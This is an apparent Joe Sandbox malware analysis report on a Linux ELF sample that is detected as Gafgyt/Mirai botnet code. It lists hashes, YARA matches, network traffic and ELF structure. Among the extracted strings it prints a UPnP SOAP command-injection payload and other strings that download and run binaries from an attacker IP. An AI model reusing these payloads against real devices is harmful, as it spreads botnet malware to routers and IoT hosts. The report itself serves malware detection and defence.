Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
17CiAkKMyC.elf

Overview

General Information

Sample name:17CiAkKMyC.elf
renamed because original name is a hash value
Original sample name:56678e12e615efcf3b48d15c66b48261.elf
Analysis ID:1530971
MD5:56678e12e615efcf3b48d15c66b48261
SHA1:8c6e836b1481b6fcfb727db28aa47ad9ee81954b
SHA256:3ec2220ac979688ea252f4bd6a8890593d4466055cc3dadebc0a02893a3dd6c4
Tags:32elfgafgyt
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1530971
Start date and time:2024-10-10 18:24:11 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:17CiAkKMyC.elf
renamed because original name is a hash value
Original Sample Name:56678e12e615efcf3b48d15c66b48261.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • VT rate limit hit for: 17CiAkKMyC.elf
Command:/tmp/17CiAkKMyC.elf
PID:5480
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5468, Parent: 3634)
  • rm (PID: 5468, Parent: 3634, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3
  • dash New Fork (PID: 5469, Parent: 3634)
  • rm (PID: 5469, Parent: 3634, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3
  • cleanup
SourceRuleDescriptionAuthorStrings
17CiAkKMyC.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    17CiAkKMyC.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      17CiAkKMyC.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        17CiAkKMyC.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          17CiAkKMyC.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x11090:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x110a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x110b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x110cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x110e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x110f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11108:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1111c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11130:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11144:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11158:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1116c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11180:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11194:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x111a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x111bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x111d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x111e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x111f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1120c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x11220:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 3 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 17CiAkKMyC.elfAvira: detected
          Source: 17CiAkKMyC.elfReversingLabs: Detection: 57%
          Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
          Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
          Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
          Source: 17CiAkKMyC.elfString found in binary or memory: http://185.196.10.215/atp%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
          Source: 17CiAkKMyC.elfString found in binary or memory: http://185.196.10.215/bins/mips
          Source: 17CiAkKMyC.elfString found in binary or memory: http://185.196.10.215/bins/mips;
          Source: 17CiAkKMyC.elfString found in binary or memory: http://185.196.10.215/bins/x86
          Source: 17CiAkKMyC.elfString found in binary or memory: http://purenetworks.com/HNAP1/
          Source: 17CiAkKMyC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: 17CiAkKMyC.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

          System Summary

          barindex
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
          Source: 17CiAkKMyC.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
          Source: classification engineClassification label: mal96.troj.linELF@0/0@2/0
          Source: /usr/bin/dash (PID: 5468)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3Jump to behavior
          Source: /usr/bin/dash (PID: 5469)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3Jump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 17CiAkKMyC.elf, type: SAMPLE
          Source: Yara matchFile source: 17CiAkKMyC.elf, type: SAMPLE

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 17CiAkKMyC.elf, type: SAMPLE
          Source: Yara matchFile source: 17CiAkKMyC.elf, type: SAMPLE
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
          File Deletion
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          17CiAkKMyC.elf58%ReversingLabsLinux.Trojan.LnxMirai
          17CiAkKMyC.elf100%AviraEXP/ELF.Gafgyt.X
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          daisy.ubuntu.com
          162.213.35.25
          truefalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://185.196.10.215/bins/x8617CiAkKMyC.elffalse
              unknown
              http://185.196.10.215/bins/mips;17CiAkKMyC.elffalse
                unknown
                http://185.196.10.215/atp%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$17CiAkKMyC.elffalse
                  unknown
                  http://schemas.xmlsoap.org/soap/encoding/17CiAkKMyC.elffalse
                  • URL Reputation: safe
                  unknown
                  http://185.196.10.215/bins/mips17CiAkKMyC.elffalse
                    unknown
                    http://purenetworks.com/HNAP1/17CiAkKMyC.elffalse
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/17CiAkKMyC.elffalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.125.190.26
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.125.190.26fNR6GoKo15.elfGet hashmaliciousMiraiBrowse
                        na.elfGet hashmaliciousUnknownBrowse
                          na.elfGet hashmaliciousUnknownBrowse
                            na.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousUnknownBrowse
                                na.elfGet hashmaliciousUnknownBrowse
                                  oQoQiI0Pdz.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousGafgytBrowse
                                      na.elfGet hashmaliciousUnknownBrowse
                                        na.elfGet hashmaliciousUnknownBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          daisy.ubuntu.comfNR6GoKo15.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.24
                                          maucl6PmW8.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.25
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CANONICAL-ASGBfNR6GoKo15.elfGet hashmaliciousMiraiBrowse
                                          • 185.125.190.26
                                          perfcc.elfGet hashmaliciousXmrigBrowse
                                          • 91.189.91.42
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 185.125.190.26
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 91.189.91.42
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 185.125.190.26
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 185.125.190.26
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 32-bit LSB executable, Synopsys ARCv3 32-bit, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
                                          Entropy (8bit):6.1075276620066195
                                          TrID:
                                          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                          File name:17CiAkKMyC.elf
                                          File size:83'448 bytes
                                          MD5:56678e12e615efcf3b48d15c66b48261
                                          SHA1:8c6e836b1481b6fcfb727db28aa47ad9ee81954b
                                          SHA256:3ec2220ac979688ea252f4bd6a8890593d4466055cc3dadebc0a02893a3dd6c4
                                          SHA512:f1cbc38ccf19bb689300a47afc8e574e091bba74552fa0335311a98b17b91995f68d80e98ceddcf7b2a55ad74dbb13caf6eea790bc95080c4dc90c5759c50835
                                          SSDEEP:1536:+8Lm4aPIBl4EvazKs8JzYfkv7qynIzZmligtM5CM1SImJTgFASc44ejW:rLMPIPs8JzYfUJaZmM1SI
                                          TLSH:5783E75BB182BBB1C86024346BDF05563ED38FF12D1B8A57B1788137EA650876A73EC4
                                          File Content Preview:.ELF........................4...`B......4. ...(.........4...4...4.......................4...4...4..................................../.../....... .......?..._..._..,....D....... ......$?..$_..$_......................H...H...H... ... ...........Q.td.......

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:<unknown>
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x11004
                                          Flags:0x400
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:8
                                          Section Header Offset:82528
                                          Section Header Size:40
                                          Number of Section Headers:23
                                          Header String Table Index:22
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .interpPROGBITS0x101340x1340x140x00x2A001
                                          .note.ABI-tagNOTE0x101480x1480x200x00x2A004
                                          .hashHASH0x101680x1680x17c0x40x2A504
                                          .gnu.hashGNU_HASH0x102e40x2e40x1c00x40x2A504
                                          .dynsymDYNSYM0x104a40x4a40x3800x100x2A614
                                          .dynstrSTRTAB0x108240x8240x19e0x00x2A001
                                          .rela.pltRELA0x109c40x9c40x2940xc0x42AI5174
                                          .initPROGBITS0x10c580xc580x1c0x00x6AX004
                                          .pltPROGBITS0x10c740xc740x3900x00x6AX004
                                          .textPROGBITS0x110040x10040x100700x00x6AX004
                                          .finiPROGBITS0x210740x110740x1c0x00x6AX004
                                          .rodataPROGBITS0x210900x110900x1f2c0x00x2A004
                                          .eh_framePROGBITS0x22fbc0x12fbc0x40x00x2A004
                                          .init_arrayINIT_ARRAY0x25f1c0x13f1c0x40x40x3WA004
                                          .fini_arrayFINI_ARRAY0x25f200x13f200x40x40x3WA004
                                          .dynamicDYNAMIC0x25f240x13f240xd00x80x3WA604
                                          .got.pltPROGBITS0x25ff40x13ff40xe80x00x3WA004
                                          .dataPROGBITS0x260dc0x140dc0x6c0x00x3WA004
                                          .bssNOBITS0x261480x141480x42740x00x3WA004
                                          .commentPROGBITS0x00x141480x380x10x30MS001
                                          .ARC.attributes<unknown>0x00x141800x260x00x0001
                                          .shstrtabSTRTAB0x00x141a60xb70x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          PHDR0x340x100340x100340x1000x1002.55700x4R 0x4
                                          INTERP0x1340x101340x101340x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                          LOAD0x00x100000x100000x12fc00x12fc06.32000x5R E0x2000.interp .note.ABI-tag .hash .gnu.hash .dynsym .dynstr .rela.plt .init .plt .text .fini .rodata .eh_frame
                                          LOAD0x13f1c0x25f1c0x25f1c0x22c0x44a03.80440x6RW 0x2000.init_array .fini_array .dynamic .got.plt .data .bss
                                          DYNAMIC0x13f240x25f240x25f240xd00xd02.45370x6RW 0x4.dynamic
                                          NOTE0x1480x101480x101480x200x201.49880x4R 0x4.note.ABI-tag
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                          GNU_RELRO0x13f1c0x25f1c0x25f1c0xe40xe42.50350x4R 0x1.init_array .fini_array .dynamic
                                          TypeMetaValueTag
                                          DT_NEEDEDsharedliblibc.so.00x1
                                          DT_INITvalue0x10c580xc
                                          DT_FINIvalue0x210740xd
                                          DT_INIT_ARRAYvalue0x25f1c0x19
                                          DT_INIT_ARRAYSZbytes40x1b
                                          DT_FINI_ARRAYvalue0x25f200x1a
                                          DT_FINI_ARRAYSZbytes40x1c
                                          DT_HASHvalue0x101680x4
                                          DT_GNU_HASHvalue0x102e40x6ffffef5
                                          DT_STRTABvalue0x108240x5
                                          DT_SYMTABvalue0x104a40x6
                                          DT_STRSZbytes4140xa
                                          DT_SYMENTbytes160xb
                                          DT_INITvalue0x10c580xc
                                          DT_FINIvalue0x210740xd
                                          DT_DEBUGvalue0x00x15
                                          DT_PLTGOTvalue0x10c740x3
                                          DT_PLTRELSZbytes6600x2
                                          DT_PLTRELpltrelDT_RELA0x14
                                          DT_JMPRELvalue0x109c40x17
                                          DT_NULLvalue0x00x0
                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                          .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          __errno_location.dynsym0x10f440FUNC<unknown>DEFAULTSHN_UNDEF
                                          __uClibc_main.dynsym0x10eb40FUNC<unknown>DEFAULTSHN_UNDEF
                                          accept.dynsym0x10da40FUNC<unknown>DEFAULTSHN_UNDEF
                                          bind.dynsym0x10de40FUNC<unknown>DEFAULTSHN_UNDEF
                                          calloc.dynsym0x10db40FUNC<unknown>DEFAULTSHN_UNDEF
                                          chdir.dynsym0x10e140FUNC<unknown>DEFAULTSHN_UNDEF
                                          clock.dynsym0x10f840FUNC<unknown>DEFAULTSHN_UNDEF
                                          close.dynsym0x10fc40FUNC<unknown>DEFAULTSHN_UNDEF
                                          closedir.dynsym0x10fa40FUNC<unknown>DEFAULTSHN_UNDEF
                                          connect.dynsym0x10cb40FUNC<unknown>DEFAULTSHN_UNDEF
                                          exit.dynsym0x10f540FUNC<unknown>DEFAULTSHN_UNDEF
                                          fcntl.dynsym0x10fb40FUNC<unknown>DEFAULTSHN_UNDEF
                                          fork.dynsym0x10ea40FUNC<unknown>DEFAULTSHN_UNDEF
                                          free.dynsym0x10fd40FUNC<unknown>DEFAULTSHN_UNDEF
                                          getpid.dynsym0x10ce40FUNC<unknown>DEFAULTSHN_UNDEF
                                          getppid.dynsym0x10ef40FUNC<unknown>DEFAULTSHN_UNDEF
                                          getsockname.dynsym0x10ff40FUNC<unknown>DEFAULTSHN_UNDEF
                                          getsockopt.dynsym0x10f240FUNC<unknown>DEFAULTSHN_UNDEF
                                          htonl.dynsym0x10e640FUNC<unknown>DEFAULTSHN_UNDEF
                                          htons.dynsym0x10f340FUNC<unknown>DEFAULTSHN_UNDEF
                                          inet_addr.dynsym0x10df40FUNC<unknown>DEFAULTSHN_UNDEF
                                          ioctl.dynsym0x10c940FUNC<unknown>DEFAULTSHN_UNDEF
                                          kill.dynsym0x10dd40FUNC<unknown>DEFAULTSHN_UNDEF
                                          listen.dynsym0x10e940FUNC<unknown>DEFAULTSHN_UNDEF
                                          malloc.dynsym0x10d240FUNC<unknown>DEFAULTSHN_UNDEF
                                          memcpy.dynsym0x10d040FUNC<unknown>DEFAULTSHN_UNDEF
                                          memmove.dynsym0x10cd40FUNC<unknown>DEFAULTSHN_UNDEF
                                          memset.dynsym0x10ec40FUNC<unknown>DEFAULTSHN_UNDEF
                                          ntohl.dynsym0x10e040FUNC<unknown>DEFAULTSHN_UNDEF
                                          ntohs.dynsym0x10ee40FUNC<unknown>DEFAULTSHN_UNDEF
                                          open.dynsym0x10f740FUNC<unknown>DEFAULTSHN_UNDEF
                                          opendir.dynsym0x10f140FUNC<unknown>DEFAULTSHN_UNDEF
                                          prctl.dynsym0x10cf40FUNC<unknown>DEFAULTSHN_UNDEF
                                          rand.dynsym0x10e340FUNC<unknown>DEFAULTSHN_UNDEF
                                          read.dynsym0x10e540FUNC<unknown>DEFAULTSHN_UNDEF
                                          readdir.dynsym0x10d740FUNC<unknown>DEFAULTSHN_UNDEF
                                          readlink.dynsym0x10d140FUNC<unknown>DEFAULTSHN_UNDEF
                                          realloc.dynsym0x10e840FUNC<unknown>DEFAULTSHN_UNDEF
                                          recv.dynsym0x10ca40FUNC<unknown>DEFAULTSHN_UNDEF
                                          recvfrom.dynsym0x10d440FUNC<unknown>DEFAULTSHN_UNDEF
                                          select.dynsym0x10d640FUNC<unknown>DEFAULTSHN_UNDEF
                                          send.dynsym0x10d940FUNC<unknown>DEFAULTSHN_UNDEF
                                          sendto.dynsym0x10e740FUNC<unknown>DEFAULTSHN_UNDEF
                                          setsid.dynsym0x10f940FUNC<unknown>DEFAULTSHN_UNDEF
                                          setsockopt.dynsym0x10e240FUNC<unknown>DEFAULTSHN_UNDEF
                                          sigaddset.dynsym0x10d840FUNC<unknown>DEFAULTSHN_UNDEF
                                          sigemptyset.dynsym0x10cc40FUNC<unknown>DEFAULTSHN_UNDEF
                                          signal.dynsym0x10e440FUNC<unknown>DEFAULTSHN_UNDEF
                                          sigprocmask.dynsym0x10fe40FUNC<unknown>DEFAULTSHN_UNDEF
                                          sleep.dynsym0x10d340FUNC<unknown>DEFAULTSHN_UNDEF
                                          socket.dynsym0x10d540FUNC<unknown>DEFAULTSHN_UNDEF
                                          srand.dynsym0x10ed40FUNC<unknown>DEFAULTSHN_UNDEF
                                          strlen.dynsym0x10f640FUNC<unknown>DEFAULTSHN_UNDEF
                                          time.dynsym0x10f040FUNC<unknown>DEFAULTSHN_UNDEF
                                          write.dynsym0x10dc40FUNC<unknown>DEFAULTSHN_UNDEF
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 10, 2024 18:25:07.877640963 CEST46540443192.168.2.14185.125.190.26
                                          Oct 10, 2024 18:25:38.852396011 CEST46540443192.168.2.14185.125.190.26
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 10, 2024 18:27:42.174618006 CEST5208553192.168.2.141.1.1.1
                                          Oct 10, 2024 18:27:42.174679995 CEST3289653192.168.2.141.1.1.1
                                          Oct 10, 2024 18:27:42.182248116 CEST53328961.1.1.1192.168.2.14
                                          Oct 10, 2024 18:27:42.182348013 CEST53520851.1.1.1192.168.2.14
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 10, 2024 18:27:42.174618006 CEST192.168.2.141.1.1.10x5290Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                          Oct 10, 2024 18:27:42.174679995 CEST192.168.2.141.1.1.10xcd5eStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 10, 2024 18:27:42.182348013 CEST1.1.1.1192.168.2.140x5290No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                          Oct 10, 2024 18:27:42.182348013 CEST1.1.1.1192.168.2.140x5290No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                          System Behavior

                                          Start time (UTC):16:24:48
                                          Start date (UTC):10/10/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):16:24:48
                                          Start date (UTC):10/10/2024
                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.czFjcWPh1i /tmp/tmp.ElHTL6aAuP /tmp/tmp.rpE6mXwnI3
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                          Start time (UTC):16:24:48
                                          Start date (UTC):10/10/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):16:24:48
                                          Start date (UTC):10/10/2024
